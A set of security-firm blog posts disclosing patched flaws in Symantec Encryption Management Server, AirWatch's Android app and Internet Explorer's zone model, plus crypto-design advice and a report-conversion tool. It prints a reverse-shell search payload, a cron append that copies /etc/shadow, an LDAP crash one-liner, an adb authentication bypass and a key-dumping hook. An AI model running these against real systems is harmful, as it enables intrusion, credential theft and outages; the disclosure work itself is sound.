
Vulnerability Disclosure Info: Symantec Encryption Management Server

During a security assessment project in 2015, GDS encountered a fully patched Symantec Encryption Management Server appliance. This product provides secure messaging both between users of the organization and with external users. Each server is managed via an administrative web interface. During the project, and in follow-on research, GDS discovered several issues that were reported to Symantec and have subsequently been addressed in later releases of the software. Now that Symantec customers, among them some of our clients, have had ample time to apply the relevant patches we thought we’d share details of these vulnerabilities.

OS Command Execution

The administration web interface includes the facility to search the log files. When performing a search it was possible, using a specially crafted search term, to execute OS-level commands on the appliance. The search functionality dynamically built a command string containing untrusted user input, which was then executed by the operating system command shell. Insufficient validation of the supplied parameters allowed arbitrary command execution, providing an attacker with privileges and capabilities previously unavailable.
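The underlying anti-pattern is worth spelling out. The sketch below is illustrative only (it uses `echo` in place of the appliance’s real log-search command, and the function names are ours): building a shell command by string concatenation lets a crafted search term inject additional commands, while passing arguments as a list keeps the shell out of the picture entirely.

```python
import subprocess

def search_logs_vulnerable(term):
    # Dynamically builds a command string that the shell interprets;
    # shell metacharacters in 'term' are executed as commands.
    return subprocess.run("echo searching for " + term,
                          shell=True, capture_output=True, text=True).stdout

def search_logs_safer(term):
    # Arguments are passed directly to the program with no shell involved,
    # so metacharacters in 'term' are treated as literal text.
    return subprocess.run(["echo", "searching for", term],
                          capture_output=True, text=True).stdout

crafted = "foo; echo INJECTED"
print(search_logs_vulnerable(crafted))  # the injected echo runs
print(search_logs_safer(crafted))       # the semicolon stays literal
```

The same principle applies in any language: parameterise the command invocation rather than interpolating user input into a shell string.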

This issue required a user account with low privilege access to the administrative interface. The lowest privilege user role with this level of access is Reporter.

The following text, entered into the search box, was used to start an interactive reverse TCP shell.

`| /bin/bash -i >& /dev/tcp/ 0>&1`

The resulting interactive shell is executed as user tomcat.

CVE-2015-8151 was assigned to cover the above issue.

Local Privilege Escalation

The tomcat user had write access to the file /etc/cron.daily/tomcat.cron. The contents of this file were executed in the context of the root super-user account. Consequently, given command execution (see above), arbitrary commands could be scheduled for execution as root.

ls -al /etc/cron.daily/tomcat.cron

-rwxrwxr-x 1 root tomcat 88 Jul  6 03:58 /etc/cron.daily/tomcat.cron

As the tomcat user, GDS were able to append additional content to the cron job. For example, with the command below:

$ echo 'cat /etc/shadow >/tmp/shadow' >> /etc/cron.daily/tomcat.cron

This cron job was executed daily and ran with root privileges.
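Misconfigurations of this type are easy to hunt for. A minimal sketch (the helper names are ours, not part of the appliance) that flags cron job files writable by group or other:

```python
import os
import stat

def group_or_world_writable(path):
    """True if the file mode grants write access beyond the owner."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def find_writable_cron_jobs(dirs=("/etc/cron.daily", "/etc/cron.hourly",
                                  "/etc/cron.weekly")):
    # Any hit here can be appended to by members of the file's group
    # (or by anyone, if world-writable) and later runs as root,
    # which is exactly the tomcat.cron case above.
    hits = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            p = os.path.join(d, name)
            if os.path.isfile(p) and group_or_world_writable(p):
                hits.append(p)
    return hits
```

Running this as part of a build or hardening check would have flagged the 0775 permissions on tomcat.cron immediately.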

ls -l /tmp/shadow

-rw-r--r-- 1 root root 825 Jul  6 04:02 /tmp/shadow

cat /tmp/shadow


CVE-2015-8150 was assigned to cover the above issue.

Heap Based Memory Corruption

GDS also discovered a repeatable crash in the LDAP service running on the appliance. This could be reproduced using the following simple Python script.

python -c "import socket; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(('', 636)); s.send('803a01030100030000002e00000040404141414142424242434343434444313145454545464646464747474731314848494949494a4a4a4a4b4b4b4b'.decode('hex'))"

This will trigger a SIGSEGV signal and the service will exit. LDAP and LDAPS will not be available until the service has been automatically restarted.

CVE-2015-8149 was assigned to cover the above issue.

Vendor Update

Symantec have released fixes for the issues described above in SEMS 3.3.2 MP12. For more information, see the vendor’s advisory.


Insights from the Crypto Trenches

At GDS we are in the particularly advantageous position of working with a wide variety of products, spending time understanding their security and often uncovering their flaws. Given this experience, we decided to share some of our thoughts on the cryptographic aspects of building modern software.

It should come as no surprise to anyone in the field of security engineering that working with crypto is a perilous business, and even highly experienced engineers sometimes get it wrong. Sophisticated attacks come along once in a while, partially breaking OpenSSL and other well-respected security libraries. However, for those who have spent enough time in the trenches of cryptographic security, it is clear that the vast majority of crypto issues don’t stem from an underlying vulnerability in a well-respected library. Instead, they overwhelmingly stem from incorrect design and implementation-specific misuse of well-built crypto components. In this blog post we try to expand on why design and implementation go wrong and give advice on making things go better.

Modern, agile software development processes generally merge some of the stages of requirements analysis, architecture, design, implementation and testing. However, in the case of cryptography it is dangerous to conflate these distinct stages. Cryptography must be considered at all of these stages, and because of its difficulty and its importance for securing critical data and decisions, it must be given higher priority than most other elements. As such, it is typical for a software house to discuss crypto-related decisions for longer, and to entrust the cryptographic aspects of the system to one of its most senior engineers. Both of these help, as do checklists such as those implemented by [1] or guidance such as that provided on Martin Fowler’s blog [2].

However, no checklists or easy guides exist for hand-rolled cryptographic constructs. When it comes to designing systems that use cryptography to achieve an end goal, one of the fundamental mistakes made by designers is to reinvent the wheel in the crypto design space. This is not usually because anybody wants the burden of designing something new. Instead, it is because it is hard to know which class of problems can be solved with a given cryptographic construct. It also doesn’t help that cryptographic terminology can be very confusing. For example, Pseudo Random Functions (PRFs) are always implemented as deterministic functions that neither use, nor exhibit, any random behaviour [3]. For this reason, GDS recommends bringing in experts, either internal or external, to early crypto design discussions. An expert can not only help mitigate the risk of misusing cryptography, but may also offer ways of reusing existing crypto constructs, reducing the overall cost and time budget of the project.
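The PRF point is easy to demonstrate concretely. HMAC-SHA-256, a standard construction commonly modelled as a PRF, is fully deterministic; the “pseudo-randomness” refers to the output being indistinguishable from random to anyone who does not hold the key, not to any randomness in its computation:

```python
import hmac
import hashlib

key = b"secret-key"

# Same key and message always yield the same output: a PRF is a
# deterministic function, despite its name.
out1 = hmac.new(key, b"message", hashlib.sha256).hexdigest()
out2 = hmac.new(key, b"message", hashlib.sha256).hexdigest()
assert out1 == out2

# A different key yields an unrelated-looking output.
out3 = hmac.new(b"other-key", b"message", hashlib.sha256).hexdigest()
assert out3 != out1
```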

When it comes to writing code, those who are entrusted to implement the agreed-upon design often find themselves in a tight spot. They have to battle with two separate issues: what crypto library to use for a particular crypto construct and in what way should it be used.

At GDS, we advise our clients to use very few, battle-hardened crypto libraries with strongly restricted configuration sets to meet a large set of generic requirements. Unfortunately, cryptographic agility [4], as implemented by OpenSSL, is often at odds with restricted configurations and hardening. Although OpenSSL is the default go-to crypto library of choice, politics such as government-mandated cryptographic primitives (CAMELLIA from Japan, ARIA from South Korea, GOST from Russia, etc.) and misguided optimizations (such as 27,000 lines of Perl generating assembly in OpenSSL) also make it the elephant in the room that no one really wants to question. However, there is very little else to opt for. The obvious other choice is libnacl [5], written by a team led by Dan Bernstein, which tries to significantly limit the number of implemented crypto constructs and hence configurations, reducing the cognitive load and simplifying the job of the person charged with implementation. Although libnacl is a great library, its restricted functionality is often an issue; it does, however, excel at what it implements. This is true of other specialized libraries as well, such as scrypt [6], which can be used for storing salted and hashed passwords or for deriving keys from passwords. The library libsodium [7] builds on libnacl, attempting to address some of its portability and usability concerns. However, it is relatively new and mostly written by a single developer without the crypto pedigree of the nacl team. We therefore caution against using it in production environments. Working with cryptography in code is not easy, which leads us to our next topic.

The second biggest headache that developers face at the implementation stage is the actual code around the use of the chosen crypto library and its constructs. It is not unheard of to see developers surprised to find their sensitive memory-cleaning code optimised away by smart compilers [8]. As such, GDS recommends enforcing high quality standards around crypto code. In all instances, the actual standards enforced are a function of language, developer familiarity, and a number of business factors such as coding culture; however, [9] and [10] are good starting points for C/C++. For example, when coding in C11, using the secure versions of functions, which typically end in “_s”, is good practice: the C11 standard requires that memset_s never be optimised away. Given the number of pitfalls such as these, internal code reviews and a final, third-party code review by an expert are important and highly recommended. Whether the third party is internal or external to the organisation, an expert will pick up problems that those less well versed in the use of crypto may not.

Finally, before software is shipped to customers, an overall, system level review of all elements of the cryptographic system is in order. As the above examples show, it is not easy to get crypto right even if the bits and pieces fit well together. Unfortunately, holistic security of a product depends on intricate interactions of the cryptographic subsystem with the rest of the application, its users, the cultural and social environments it will get deployed in, and the business’ goals. The points where these meet are an ample source of confusion and error. As such, a final review is always recommended.

At GDS, we get to see a lot of crypto code, often only at the final stages of development or beyond, when it’s already in active use by end users. Fixing issues at this stage is costly to the business and frustrating to the developers. Sometimes, when looking at the issues, one wonders how much time could have been saved by using the correct crypto constructs from the right libraries and following good coding guidelines from the get-go: no wasteful reinvention of the wheel and no costly retrofitting needed. When it comes to crypto, experience is key. Above, we have tried to put into writing some of the key recommendations that experienced crypto engineers give to solve real-world problems. Naturally, we have plenty more, but we always try to tailor them to the needs of the application at hand. In a series of blog posts to follow we plan to go more in-depth into some of the crypto issues we highlighted above, and more.



AirWatch Vulnerabilities from the GDS Archives


At GDS, we’ve researched many Mobile Application Management (MAM) container platforms over the years. Early last year, we published a whitepaper and security checklist on the subject to assist developers, security teams, and buyers of MAM platforms. Today we’re releasing details on vulnerabilities in the AirWatch MAM platform that we discovered two years ago and that have long since been patched. We still regularly run into these types of bugs in similar platforms in 2016, so we thought it’d be helpful to take a look at a few of them in detail.

In May 2014, we were doing independent vulnerability research poking around at the AirWatch Mobile Device Management Secure Content Locker (SCL) application for Android. During our brief analysis, we discovered a number of vulnerabilities in the SCL application that could allow an attacker with access to a user’s device to bypass the application security and gain access to the encrypted content stored in the application’s sandbox. GDS disclosed the vulnerabilities to AirWatch in May 2014. These have all been remediated by the application vendor and are listed below:

1. User Passwords Susceptible to Offline Brute Force Attacks

2. Inadequate Enterprise Wipe

3. Symmetric Key stored using Java String Object

4. Authentication Bypass via Exported Activities

5. Static IV Used in Cryptographic Operation 

These issues, discovered by Ron Gutierrez, were present in AirWatch Android Agent v4.5.3.782 and Secure Content Locker (SCL) v1.9.2, and were fixed in versions 5.1 and 2.1 respectively. GDS would like to commend AirWatch on their responsiveness and rapid deployment of fixes.

These issues will be discussed further in the rest of this blog post.

Issue Descriptions

User Passwords Susceptible to Offline Brute Force Attacks

The routines used to perform offline authentication to the AirWatch Secure Content Locker application used an unsalted SHA-256 hash to validate the user’s passphrase. This made it possible for an attacker who gains access to a victim’s stolen device to perform an offline brute force attack on this hash in order to determine the AirWatch authentication credentials. Depending on how an organization integrates authentication with AirWatch, these credentials are likely to be the user’s Active Directory password. However, as in our case below, this could be an AirWatch-specific password. Note that while AirWatch employs device root detection, this does not prevent an attacker who has stolen the device from rooting it and then directly accessing the configuration file storing the hash. This configuration file is at the following location:


An example of the contents of this file is shown below:

<string name="seedHash">NEHfC6vCot2lUdfNOfsjW8TgnNHkVWvyYbtJGI9Ug0g=</string>

GDS verified that this was indeed the AirWatch specific password set up for our test device using the following python code:

>>> import base64
>>> import hashlib
>>> output = base64.b64encode(hashlib.sha256("testing1234").digest())
>>> print(output)
NEHfC6vCot2lUdfNOfsjW8TgnNHkVWvyYbtJGI9Ug0g=
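Because the hash is unsalted and computed with a single fast SHA-256 invocation, a dictionary attack against it is straightforward. A minimal sketch of that attack follows; note that here the target hash is recomputed locally rather than copied from a device, and the function names are ours:

```python
import base64
import hashlib

def seed_hash(password):
    # Mirrors the scheme described above: a single unsalted SHA-256,
    # base64-encoded.
    return base64.b64encode(hashlib.sha256(password.encode()).digest()).decode()

# Stand-in for a seedHash value recovered from a stolen device.
stored = seed_hash("testing1234")

def brute_force(stored_hash, wordlist):
    # One cheap hash per guess; a salt and a slow KDF (e.g. PBKDF2 with a
    # high iteration count) would make this attack far more expensive.
    for candidate in wordlist:
        if seed_hash(candidate) == stored_hash:
            return candidate
    return None

print(brute_force(stored, ["password", "letmein", "testing1234"]))  # testing1234
```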

Inadequate Enterprise Wipe

AirWatch provides an Enterprise Wipe option that is available to device administrators. This option performs an application-level wipe rather than initiating a full device wipe, allowing organizations using AirWatch to remove company resources from an employee-owned device while leaving personal data and the underlying phone configuration intact.

Unfortunately, the Enterprise Wipe functionality failed to adequately eliminate company data from the device’s application directory. Therefore, even after this wipe was performed potentially sensitive data was still present in the following directories:


This can be verified by performing an “Enterprise Wipe” yourself and then checking these directories to see the artifacts left behind, such as the “seedHash” from the finding above.

Symmetric key stored using Java String Object

This vulnerability had two distinct issues. Firstly, storing sensitive values in a Java String object will prevent the value from being properly cleared from memory. This is the same reason why it is not recommended to use String objects to process passwords. Java String objects are immutable and can persist long after they are required by the application. The application has little control over when the garbage collector will recycle the memory and even when it is collected the contents may persist until the memory has been reallocated and written to. This increases the risk of the key being read from device memory by malware or stolen using a privilege escalation vulnerability that does not require a device reboot. This vulnerability was verified by decompiling the source code of the binary application as shown below:

private String e(String paramString1, String paramString2)
{
  char[] arrayOfChar = paramString1.toCharArray();
  String str1 = this.d.getString("Vector", "");
  String str2;
  if (str1.length() == 0)
  {
    str2 = h();
    String str3 = Base64.encodeToString(str2.getBytes(), 0);
    SharedPreferences.Editor localEditor = this.d.edit();
    localEditor.putString("Vector", str3);
  }
  byte[] arrayOfByte;
  while (true)
  {
    PBEKeySpec localPBEKeySpec = new PBEKeySpec(arrayOfChar,
                                                a(paramString2, str2, "A1rW4tchR0xin4t0R"),
                                                20000, 256);
    arrayOfByte = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1")
    if (arrayOfByte != null)
      return null;
    str2 = new String(Base64.decode(str1, 0));
  }
  return new String(arrayOfByte);
}

The second issue is that using a String object to store a symmetric key value can lead to a decrease in the overall entropy of the key due to String objects attempting to convert the key material to charset encodings. On Android, the default charset is UTF-8 and any byte sequence that is not a valid UTF-8 character will be replaced with the byte sequence EF BF BD (hex), which corresponds to the Unicode codepoint U+FFFD ‘REPLACEMENT CHARACTER’. This introduces a security risk since invalid byte sequences within the key will be converted to the EFBFBD sequence reducing the overall entropy of the key.
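The lossy conversion is easy to reproduce. The sketch below uses plain Python standing in for Java’s `new String(bytes)` behaviour: decoding key bytes as UTF-8 with replacement turns every invalid byte into U+FFFD, which re-encodes as the fixed sequence EF BF BD, destroying the original key material:

```python
# A 3-byte "key" whose last two bytes are not valid UTF-8.
raw_key = b"K\xff\xfe"

# Equivalent to Java's lossy byte-to-String conversion: invalid
# sequences are replaced with U+FFFD rather than preserved.
as_string = raw_key.decode("utf-8", errors="replace")

# Recovering bytes from the String no longer yields the original key:
# each invalid byte has collapsed to the constant sequence EF BF BD.
round_tripped = as_string.encode("utf-8")
print(round_tripped.hex())  # 4befbfbdefbfbd
```

Because every invalid byte maps to the same three-byte constant, an attacker knows those positions of the key exactly, which is the entropy loss described above. Keys should be kept in byte arrays (Java `byte[]`), never converted through a charset.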

Using the Cydia Substrate tool available on rooted Android devices we can write hooks for Java methods to, for example, print out the contents of the parameters during runtime. The following hook was written to print out the contents of the parameters to the com.airwatch.crypto.openssl.e.b(byte[], String) method.

MS.hookClassLoad("com.airwatch.crypto.openssle", new MS.ClassLoadHook() {
  public void classLoaded(Class<?> resources) {
    String methodName = "a";
    Method lmethod;
    try {
      lmethod = resources.getMethod(methodName, Context.class);
    } catch (NoSuchMethodException e) {
      Log.w(_TAG, "No such method: " + methodName);
      lmethod = null;
    }
    final MS.MethodPointer old = new MS.MethodPointer();
    if (lmethod != null) {
      MS.hookMethod(resources, lmethod, new MS.MethodHook() {
        public Object invoked(Object resources, Object... args)
                      throws Throwable {
          Log.i(_TAG, "com.airwatch.a.b.a() is hit");
          Log.i(_TAG, "param1: " + bytesToHex((byte[]) args[0]));
          Log.i(_TAG, "param2: " + printString((String) args[1]));
          return old.invoke(resources, args);
        }
      }, old);
    }
  }
});

public static String bytesToHex(byte[] bytes) {
  char[] hexChars = new char[bytes.length * 2];
  for (int j = 0; j < bytes.length; j++) {
    int v = bytes[j] & 0xFF;
    hexChars[j * 2] = hexArray[v >>> 4];
    hexChars[j * 2 + 1] = hexArray[v & 0x0F];
  }
  return new String(hexChars);
}

The console output below shows the values returned by the application.

param1: 4B46FAF3F28FA6B3F7A44951D4F8330CCD0C82D42438D053209B21473EEA130545605F245D241E1B332ECBF87F263B9E

// Base64 decoded 'master_encryption_key' stored in SharedPreferences XML file.


// Derived encryption key from AirWatch password

As you can see in the output above, the charset conversion process causes the resulting symmetric key to lose a total of 22 bytes of entropy, rather than containing the expected 32 bytes of entropy.

Authentication Not Enforced When Calling Search or Main Activities Directly

The application contains several Activities, which can be found in the AndroidManifest.xml file, that can be abused to bypass the password lock screen. These Activities do not contain the necessary logic to force the user back to the authentication screen. By exploiting this issue an attacker can access metadata of files stored within SCL without knowledge of the user’s login credentials. We can therefore deduce that either the file metadata is not encrypted by the application, or that the application can decrypt the content stored in its application directory without requiring the user’s credentials. Either scenario is bad for an application such as this. A walkthrough for exploiting this behavior in the Search Activity is provided below. Exploitation of the Main Activity is identical, the only caveat being that exploiting the Main Activity requires the device to be rooted.

Below you can see the intent filter for the SearchActivity from the AndroidManifest.xml file:

<activity android:name="com.airwatch.contentlocker.ui.SearchActivity">
  <intent-filter>
    <action android:name="android.intent.action.SEARCH" />
  </intent-filter>
  <meta-data android:name=""
             android:resource="@xml/searchable" />
</activity>


With the SCL application closed on the target device, connect to the device with adb in the usual manner, then enter the following command to manually invoke the SearchActivity:

adb shell am start -a android.intent.action.SEARCH -n com.airwatch.contentlocker/com.airwatch.contentlocker.ui.SearchActivity -e "query" "t"

When the above command is run, the SearchActivity fires and, checking the target device’s screen, you will see that a search was performed for the input “t”, as seen in the screenshots below:

Static IV Used in Cryptographic Operations

The last issue that GDS discovered in the AirWatch SCL application reflects a bad practice that is fairly pervasive throughout the cryptography world. As stated in the title, a static IV is used in several of the cryptographic operations performed by the application, including the one responsible for decrypting managed files: awFileDecryptUsingKeyIV. The awFileDecryptUsingKeyIV function accepts several arguments: the path to the encrypted file, the path to the output file, the decryption key, and the IV. The IV in this case consists of the numbers 0 through 15, repeated twice, to create a 32-byte IV. A static IV does not directly reveal the key, but it makes encryption deterministic: identical plaintexts produce identical ciphertexts under the same key, so an attacker comparing multiple ciphertexts can detect repeated or related content, and in some modes mount practical plaintext-recovery attacks. The more data encrypted under the same key and IV, the more such relationships leak.

A code snippet has been provided below. Since the decompiled code was obfuscated, the filenames and variables below will need to be mapped to the original codebase in order to locate the vulnerable code.

private static final byte[] j = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
                                  0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 };

public static void a(File paramFile1, File paramFile2, String paramString)
{
  i.lock();
  try
  {
    e.awFileDecryptUsingKeyIV(c.getFileStreamPath("fipsOpenSSlRSA.enc").getAbsolutePath(),
                              paramFile1.getAbsolutePath(),
                              paramFile2.getAbsolutePath(),
                              paramString.getBytes(), j);
    return;
  }
  finally
  {
    i.unlock();
  }
}


As can be seen in the decompiled code snippet above, the IV value is the numbers 0 through 15 repeated twice in a byte array.
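The practical impact of a fixed IV can be sketched with a toy stream cipher built from SHA-256. This is a simplified model for illustration, not AirWatch’s actual FIPS OpenSSL cipher: when the same key and IV are reused, the keystream cancels out and the XOR of two ciphertexts equals the XOR of the two plaintexts, leaking their relationship without any knowledge of the key.

```python
import hashlib

def keystream(key, iv, length):
    # Toy counter-mode keystream derived with SHA-256. Illustrative only.
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + iv + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def encrypt(key, iv, plaintext):
    ks = keystream(key, iv, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))

KEY = b"k" * 32
STATIC_IV = bytes(range(16)) * 2  # the 0..15-twice pattern from above

p1 = b"salary: 100000"
p2 = b"salary: 900000"
c1 = encrypt(KEY, STATIC_IV, p1)
c2 = encrypt(KEY, STATIC_IV, p2)

# With a reused IV the keystream cancels out: c1 XOR c2 == p1 XOR p2,
# so an observer learns exactly where and how the plaintexts differ.
xor_ct = bytes(a ^ b for a, b in zip(c1, c2))
xor_pt = bytes(a ^ b for a, b in zip(p1, p2))
assert xor_ct == xor_pt
```

The fix is standard: generate a fresh, random IV per encryption and store it alongside the ciphertext.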


Local Request Forgery

This post explains how to abuse Internet Explorer’s Local Intranet Zone using malicious web pages served from the local disk. In corporate environments this could lead to impersonation of the victim on internal web applications and exfiltration of data outside the corporate network. 

Internet Explorer renders web pages in Security Zones; each zone comes with security settings that reflect the level of safety of that zone. 

When Internet Explorer opens a web page, the Urlmon DLL determines the zone from which the page was loaded. There are four predefined security zones:

  • Local intranet zone: all sites inside an organisation.

  • Trusted sites zone: all sites considered trusted.

  • Restricted sites zone: all sites considered not trusted. 

  • Internet zone: all Internet sites (not in the Trusted or Restricted zones).

In addition to the above four zones, the hidden My Computer zone includes all files served from network shares, the local hard disk and removable drives.


Cross-Site Request Forgery (CSRF) is an attack that abuses the inherent trust a web server places in the browser. Generally, any request within an authenticated session is assumed to be made, directly or indirectly, by the user. The attack described below can be considered a variation of Cross-Site Request Forgery where the attacker can also read the response. Instead of coercing the user to visit a malicious Internet website, the attacker sends an email with a malicious HTML page attached; when the victim opens this page with Internet Explorer it is loaded from the local file system and Internet Explorer (IE) renders it in the My Computer security zone. This zone allows scripts to issue requests to any website, bypassing both the Same Origin Policy (SOP) and Cross-Origin Resource Sharing (CORS).


Since IE 7, Protected Mode adds an integrity mechanism to restrict write access to securable objects (like processes, files, and registry keys) with higher integrity levels. If Protected Mode is disabled, cookies are included when (malicious) scripts issue HTTP requests. The Local Intranet Zone is used in many corporate environments for internal web applications, and note that Protected Mode is disabled by default for the Local Intranet Zone on all current versions of Internet Explorer. Consequently, the malicious web page attached to an email described above can include JavaScript to target an internal application to which the victim is authenticated. This JavaScript will bypass SOP and CORS, because the page is rendered in the My Computer Zone, which enables the attacker to perform requests and read responses.


Demo Application

A simple demo web application was built as a Proof-of-Concept. The application is served from the Local Intranet Zone domain www.corporate.internal as shown in the screenshot below:


Monet HR is a web application used for HR purposes; it allows employees to view and manage their personal data such as personal and employment information, compensation, holidays, etc.


The demo application exposes a single Servlet to authenticated users:


The servlet allows the user to perform two actions:

  • getCSRF (retrieves the CSRF token associated with the user’s session)

  • getInfos (retrieves the user’s information; requires a CSRF token)



The attack relies on the following preconditions:

  1. The target web application is served from the Local Intranet Zone.

  2. Protected mode is turned OFF for Local Intranet Zone (default).

  3. The victim is authenticated on the target web application.


Attack PoC

  1. The victim receives an email with a web page attached.

  2. The victim opens the web page with Internet Explorer.

  3. The victim clicks on “Allow Blocked Content” button.

  4. (only for demo purposes) The victim clicks on “Steal Infos”, this triggers the malicious script.


The page served from the local file disk is rendered in the My Computer Zone, and can therefore bypass the Same Origin Policy and Cross Origin Resource Sharing. It can send requests to any application in the Local Intranet Zone, and cookies will be included in the request.

  1. When clicking on the button Steal Infos the JavaScript first issues an XHR to http://corporate.internal/monet/logged/userHandler to retrieve the CSRF token. This violates CORS (the script sends a cross-domain POST request with content type application/json but no preflight OPTIONS request is performed). It also violates SOP as the script can read the response coming back from a different origin.

  2. Having retrieved the CSRF token, the JavaScript issues another request to the demo application, requesting the user’s information (a CSRF token is required in the JSON object). Again the JavaScript violates CORS and SOP, as it sends a POST request (with application/json content type) and can read the user’s personal information back.

  3. The malicious page then exfiltrates the stolen data to a third-party website using a POST request with content type application/json (thus still violating Cross-Origin Resource Sharing) and can read the response to that request as well (still violating SOP).

The above explanation is illustrated in the screenshot below, where requests and responses are printed in the DOM.

 The attacker can then view the exfiltrated data on a domain outside of the corporate network:



The attack described above may be considered a variation of Cross-Site Request Forgery. However, server-side CSRF mitigations are not applicable. The demo application employed in the PoC required the submission of an anti-CSRF token, but since the malicious JavaScript can bypass SOP and CORS, it can read the CSRF token and use it in the request.

As this is a client-side issue, the only effective mitigation is to ensure that Internet Explorer enforces SOP and CORS by enabling Protected Mode for the Local Intranet Zone. Since Internet Explorer 7.0 on Windows Vista, this can be achieved through Group Policy Objects (GPO).




Convert2FPR: Introducing ESLint and PMD support.


Expanding on our previous blog post where we released a tool to convert Findbugs’ XML output into Fortify’s FPR format, we’ve now released two additional XSL transformations to provide ESLint and PMD XML output conversion.  

ESLint is an open source JavaScript lint application written using Node.js. ESLint allows all rules to be completely configurable, allowing developers to create their own rules. A number of security plugins for client-side JavaScript and Node.js have emerged recently.

PMD is a source code analyser that supports Java, JavaScript, PL/SQL, Apache Velocity, XML and XSL. GDS released security rules for PMD in a previous post.

We’ve also added a fast XSL transformation for Findbugs, which transforms only security related issues to the FPR format.

The examples below demonstrate the current usage of the tool:


Findbugs
$ java -jar convert2FPR.jar findbugs report.xml

Fast-Findbugs (Security Issues only)
$ java -jar convert2FPR.jar findbugs-fast report.xml

ESLint
$ java -jar convert2FPR.jar eslint report.xml

PMD
$ java -jar convert2FPR.jar pmd report.xml


The first parameter represents the input format; the second parameter is the XML report we wish to transform. The output file is ./report.fpr.

The source code and compiled tool can be found in our Github Repository:
